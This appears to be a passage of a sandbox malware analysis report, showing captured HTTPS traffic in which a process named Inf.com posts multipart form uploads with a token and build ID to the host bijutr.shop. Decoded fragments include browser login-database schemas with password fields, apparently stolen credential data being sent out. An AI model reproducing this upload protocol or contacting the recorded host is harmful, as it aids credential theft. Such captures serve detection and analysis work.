                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:07 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 57 54 30 52 31 44 4a 57 42 53 4a 4d 37 59 55 4b 58 34 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 57 54 30 52 31 44 4a 57 42 53 4a 4d 37 59 55 4b 58 34 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 57 54 30 52 31 44 4a 57 42 53 4a 4d 37 59 55 4b 58 34 37 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------WT0R1DJWBSJM7YUKX47GContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------WT0R1DJWBSJM7YUKX47GContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------WT0R1DJWBSJM7YUKX47GCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:07 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:07 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:08 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  14192.168.2.549845188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:09 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----S2VA1NO8GLNYMY58GL6F
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 142457
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:09 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 32 56 41 31 4e 4f 38 47 4c 4e 59 4d 59 35 38 47 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 53 32 56 41 31 4e 4f 38 47 4c 4e 59 4d 59 35 38 47 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 53 32 56 41 31 4e 4f 38 47 4c 4e 59 4d 59 35 38 47 4c 36 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------S2VA1NO8GLNYMY58GL6FContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------S2VA1NO8GLNYMY58GL6FContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------S2VA1NO8GLNYMY58GL6FCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:09 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                                  Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:09 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:11 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  15192.168.2.549847188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:10 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----WL68Q90R9H47QI5FKFUK
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 493
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:10 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------WL68Q90R9H47QI5FKFUKContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------WL68Q90R9H47QI5FKFUKContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------WL68Q90R9H47QI5FKFUKCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:11 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  16192.168.2.549921172.64.41.34432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f8718ac6a294372-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
